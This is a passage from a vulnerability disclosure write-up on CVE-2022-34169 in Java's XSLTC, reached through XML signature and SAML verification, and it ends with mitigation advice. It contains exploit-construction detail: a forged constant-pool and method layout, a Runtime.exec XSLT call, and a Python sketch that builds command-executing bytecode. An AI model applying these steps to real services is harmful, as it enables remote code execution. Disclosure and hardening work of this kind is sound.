Going back to our payload, we can see that the start of the methods table is aligned with the tag byte of the next entry in the constant pool table. This means that the 0x06 tag of a CONSTANT_Double will clobber the access_flags field of the first method, making it unusable for us. Instead we have to create two methods: the first one as a basic filler to get the alignment right, and the second one as the actual constructor. Fortunately, the JVM ignores unknown attributes, so we can use dynamically sized attribute values. The graphic below shows how we use a series of CONST_DOUBLE entries to create a constructor method with an almost fully controlled body.


CONST_DOUBLE: 0x06 0x01 0xXX 0xXX 0xYY 0xYY 0x00 0x01 0xZZ
CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x05 0x00 0x00 0x00 0x00
CONST_DOUBLE: 0x06 0x00 0x01 0xCC 0xCC 0xDD 0xDD 0x00 0x03
CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x00 0x04 0x00 0x00 0x00
CONST_DOUBLE: 0x06 0xCC 0xDD 0xZZ 0xZZ 0xZZ 0xZZ 0xAA 0xAA
CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA
CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA
CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA
CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

First Method Header
  access_flags 0x0601
  name_index   0xXXXX
  desc_index   0xYYYY
  attr_count   0x0001
  Attribute [0]
    name_index 0xZZ06
    length     0x00000005
    data       “\x00\x00\x00\x00\x06”

Second Method Header
  access_flags 0x0001
  name_index   0xCCCC -> <init>
  desc_index   0xDDDD -> ()V
  attr_count   0x0003
  Attribute [0]
    name_index 0x0600
    length     0x00000004
    data       “\x00\x00\x00\x06”
  Attribute [1]
    name_index 0xCCDD -> Code
    length     0xZZZZZZZZ
    data       PAYLOAD
  Attribute [2] ...
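The alignment trick is easier to follow when the byte stream is walked mechanically. The sketch below builds five CONST_DOUBLE entries with made-up placeholder indices (0x0011, 0x0012, 0x0021, 0x0022 and 0x0023 are assumptions, as is the 2-byte Code body) and parses them as a methods table. All class and method names are hypothetical.

```java
import java.io.ByteArrayOutputStream;
import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.List;

// Hypothetical walk over CONST_DOUBLE entries reinterpreted as method_info structs.
final class MethodTableOverlaySketch {
    /** Five constant pool entries: tag 0x06 followed by 8 controlled bytes each. */
    static byte[] exampleTable() {
        int[][] bodies = {
            {0x01, 0x00, 0x11, 0x00, 0x12, 0x00, 0x01, 0x00}, // filler method header
            {0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00}, // attribute length 5 + data
            {0x00, 0x01, 0x00, 0x21, 0x00, 0x22, 0x00, 0x03}, // constructor header
            {0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00}, // attribute length 4 + data
            {0x00, 0x23, 0x00, 0x00, 0x00, 0x02, 0xAA, 0xAA}, // "Code" attribute, 2-byte body
        };
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        for (int[] body : bodies) {
            out.write(0x06);                       // CONSTANT_Double tag
            for (int b : body) {
                out.write(b);
            }
        }
        return out.toByteArray();
    }

    /** Parses method_info structs and records what a class file reader would see. */
    static List<String> walk(byte[] table, int methodsCount) {
        ByteBuffer buf = ByteBuffer.wrap(table);   // big-endian, like the class file format
        List<String> log = new ArrayList<>();
        for (int m = 0; m < methodsCount; m++) {
            int access = u2(buf), name = u2(buf), desc = u2(buf), attrs = u2(buf);
            log.add(String.format("method access=0x%04x name=0x%04x desc=0x%04x attrs=%d",
                access, name, desc, attrs));
            // Stop early when the sample bytes run out before attrs is reached.
            for (int a = 0; a < attrs && buf.hasRemaining(); a++) {
                int attrName = u2(buf);
                int length = buf.getInt();
                buf.position(buf.position() + length);   // skip the attribute body
                log.add(String.format("  attribute name=0x%04x length=%d", attrName, length));
            }
        }
        return log;
    }

    private static int u2(ByteBuffer buf) {
        return buf.getShort() & 0xFFFF;
    }

    public static void main(String[] args) {
        walk(exampleTable(), 2).forEach(System.out::println);
    }
}
```

Each filler attribute is sized so that its body swallows the next 0x06 tag byte, which is what lets the second method start with a clean access_flags value of 0x0001.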



We still need to bypass one limitation: JVM bytecode does not work standalone, but references and relies on entries in the constant pool. Instantiating a class or calling a method requires a corresponding constant entry in the pool. This is a problem as our bug doesn’t give us the ability to create fake constant pool entries so we are limited to constants that XSLTC adds during compilation.


Luckily, there is a way to add arbitrary class and method references to the constant pool: Java’s XSLT runtime supports calling arbitrary Java methods. As this is clearly insecure, this functionality is protected by a runtime setting and always disabled during signature verification.

However, XSLTC will still process and compile these function calls when processing a stylesheet, and the call will only be blocked at runtime (see the corresponding code in FunctionCall.java). This means that we can get references to all required methods and classes by adding an XSLT element like the one shown below:


<xsl:value-of select="rt:exec(rt:getRuntime(),'...')" xmlns:rt="java.lang.Runtime"/>



There are two final checks we need to bypass before we end up with a working class file:

  • The JVM enforces that every constructor of a subclass calls a superclass constructor before returning. This check can be bypassed by never returning from our constructor, either by adding an endless loop at the end or by throwing an exception, which is the approach I used in my exploit Proof-of-Concept. A slightly more complex, but cleaner approach is to add a reference to the AbstractTranslet constructor to the constant pool and call it. This is the approach used by thanat0s in their exploit writeup.

  • Finally, we need to skip over the rest of XSLTC’s output. This can be done by constructing a single large attribute with the right size as an element in the class attribute table.
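
The two bypasses can be sketched at the byte level as follows. This is a simplified illustration, not the proof-of-concept: the constant pool indexes are hypothetical placeholders for the entries XSLTC would add for the rt:exec call, the endless-loop variant is shown rather than the exception-throwing one, and the interleaved 0x06 tag bytes from the CONSTANT_Double layout are ignored.

```python
import struct

# Hypothetical constant pool indexes (assumptions for this sketch only).
GET_RUNTIME_REF = 0x0101    # Methodref: java/lang/Runtime.getRuntime
CMD_STRING = 0x0102         # String constant holding the command
EXEC_REF = 0x0103           # Methodref: java/lang/Runtime.exec(String)
UNKNOWN_ATTR_NAME = 0x0104  # Utf8 entry that is not a known attribute name

# JVM opcodes used below.
INVOKESTATIC, INVOKEVIRTUAL, LDC_W, POP, GOTO = 0xB8, 0xB6, 0x13, 0x57, 0xA7


def constructor_code():
    """Bytecode that runs a command and then never returns."""
    code = bytearray()
    code += struct.pack(">BH", INVOKESTATIC, GET_RUNTIME_REF)  # push Runtime
    code += struct.pack(">BH", LDC_W, CMD_STRING)              # push command
    code += struct.pack(">BH", INVOKEVIRTUAL, EXEC_REF)        # exec(command)
    code.append(POP)                                           # drop Process
    code += struct.pack(">Bh", GOTO, 0)   # branch offset 0: jump to itself
    return bytes(code)


def code_attribute_info(code, max_stack=2, max_locals=1):
    """Body of a Code attribute with no exception table and no attributes."""
    header = struct.pack(">HHI", max_stack, max_locals, len(code))
    return header + code + struct.pack(">HH", 0, 0)


def swallowing_attribute_header(name_index, trailing_len):
    """Header of an unknown attribute whose data spans trailing_len bytes."""
    return struct.pack(">HI", name_index, trailing_len)


code = constructor_code()
info = code_attribute_info(code)
tail = swallowing_attribute_header(UNKNOWN_ATTR_NAME, 1000)
print(code.hex(), len(info), tail.hex())
```

Because the final goto targets its own address, control flow never reaches a return instruction. The last helper only shows the arithmetic for the second bullet: the attribute length is set to however many bytes of XSLTC output follow the header (1000 here is an arbitrary example value).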



Once we chain all of this together, we end up with a signed XML document that can trigger the execution of arbitrary JVM bytecode during signature verification. I’ve skipped over some implementation details of this exploit, so if you want to reproduce this vulnerability, please take a look at the heavily commented proof-of-concept script.


Impact and Restrictions

In theory, every unpatched Java application that processes XML signatures is vulnerable to this exploit. However, there are two important restrictions:

  • As references are only processed after the signature of the SignedInfo element is verified, applications can be protected based on their usage of the KeySelector class. Applications that use an allowlist of trusted keys in their KeySelector will be protected as long as these keys are not compromised. An example of this would be a single-tenant SAML SP configured with a single trusted IdP key. In practice, a lot of these applications are still vulnerable, as they don’t use KeySelector directly and instead enforce this restriction in their own application logic after an unrestricted signature validation. At this point the vulnerability has already been triggered. Multi-tenant SAML applications that support customer-provided Identity Providers, as most modern cloud SaaS do, are also not protected by this limitation.

  • SAML Identity Providers can only be attacked if they support (and verify) signed SAML requests.
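
The ordering issue in the first restriction can be shown with a toy model. The Python sketch below is not the Java XML signature API: the function names, the dictionary-based document, and the SHA-256 fingerprint allowlist are all assumptions made for illustration. It only demonstrates that rejecting an untrusted key up front means the references, and with them any XSLT transform, are never processed.

```python
import hashlib


class UntrustedKeyError(Exception):
    """Raised when the signing key is not on the allowlist."""


def fingerprint(key_der):
    return hashlib.sha256(key_der).hexdigest()


def validate_signed_document(doc, trusted_fingerprints,
                             verify_signed_info, process_references):
    # 1. Key selection: refuse unknown keys before anything else happens.
    if fingerprint(doc["key_der"]) not in trusted_fingerprints:
        raise UntrustedKeyError("signing key is not on the allowlist")
    # 2. Verify the signature over SignedInfo with the selected key.
    if not verify_signed_info(doc, doc["key_der"]):
        raise ValueError("SignedInfo signature is invalid")
    # 3. Only now are references (and their transforms) processed.
    return process_references(doc)


# Stand-ins for the real verification steps; they just record the call order.
calls = []


def fake_verify(doc, key_der):
    calls.append("verify")
    return True


def fake_process(doc):
    calls.append("references")
    return "ok"


trusted = {fingerprint(b"idp-key")}
result = validate_signed_document({"key_der": b"idp-key"}, trusted,
                                  fake_verify, fake_process)
try:
    validate_signed_document({"key_der": b"attacker-key"}, trusted,
                             fake_verify, fake_process)
    rejected = False
except UntrustedKeyError:
    rejected = True

print(result, rejected, calls)
```

An application that instead runs steps 2 and 3 with any embedded key and checks the allowlist afterwards has already processed the attacker's references by the time the check fails.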


Even without CVE-2022-34169, processing XSLT during signature verification can easily be abused as part of a DoS attack. For this reason, the property org.jcp.xml.dsig.secureValidation can be enabled to forbid XSLT transformations in XML signatures. Interestingly, this property defaults to false for all JDK versions before 17 if the application is not running under the Java Security Manager. As the Security Manager is rarely used for server-side applications and JDK 17 was only released a year ago, we expect that a lot of applications are not protected by this. Limited testing of large Java-based SSO providers confirmed this assumption. Another reason for the lack of widespread usage might be that org.jcp.xml.dsig.secureValidation also disables use of the SHA1 algorithm in newer JDK versions. As SHA1 is still widely used by enterprise customers, simply enabling the property without manually configuring a suitable jdk.xml.dsig.secureValidationPolicy might not be feasible.

Conclusion

XML signatures in general and SAML in particular offer a large and complex attack surface to external attackers. Even though Java offers configuration options that can be used to address this vulnerability, they are complex, might break real-world use cases and are off by default. 


Developers who rely on SAML should make sure they understand the risks associated with it and should reduce the attack surface as much as possible by disabling functionality that is not required for their use case. Additional defense-in-depth approaches, like early validation of signing keys, an allowlist-based approach to valid transformation chains, and strict schema validation of SAML tickets, can be used for further hardening.
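
As one possible shape for a transformation-chain allowlist, the Python sketch below scans a signature for Transform elements and reports every algorithm that is not explicitly permitted. The choice of allowed algorithms and the helper names are assumptions for this example. It is a pre-filter idea only, not a replacement for secure validation in the signature library, and a real deployment would parse untrusted XML with a hardened parser.

```python
import xml.etree.ElementTree as ET

DSIG_NS = "http://www.w3.org/2000/09/xmldsig#"
XSLT_TRANSFORM = "http://www.w3.org/TR/1999/REC-xslt-19991116"

# Assumed policy: only the transforms a typical SAML response needs.
ALLOWED_TRANSFORMS = {
    "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
    "http://www.w3.org/2001/10/xml-exc-c14n#",
}


def disallowed_transforms(xml_text):
    """Return the Algorithm values of all transforms outside the allowlist."""
    root = ET.fromstring(xml_text)
    found = []
    for transform in root.iter(f"{{{DSIG_NS}}}Transform"):
        algorithm = transform.get("Algorithm")
        if algorithm not in ALLOWED_TRANSFORMS:
            found.append(algorithm)
    return found


def signature_with(transform_algorithm):
    """Build a minimal, unsigned Signature skeleton for the demo."""
    return (
        f'<Signature xmlns="{DSIG_NS}"><SignedInfo><Reference URI="">'
        f'<Transforms><Transform Algorithm="{transform_algorithm}"/>'
        "</Transforms></Reference></SignedInfo></Signature>"
    )


benign = disallowed_transforms(
    signature_with("http://www.w3.org/2001/10/xml-exc-c14n#"))
malicious = disallowed_transforms(signature_with(XSLT_TRANSFORM))
print(benign, malicious)
```

A document would be rejected before signature validation whenever the returned list is non-empty.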

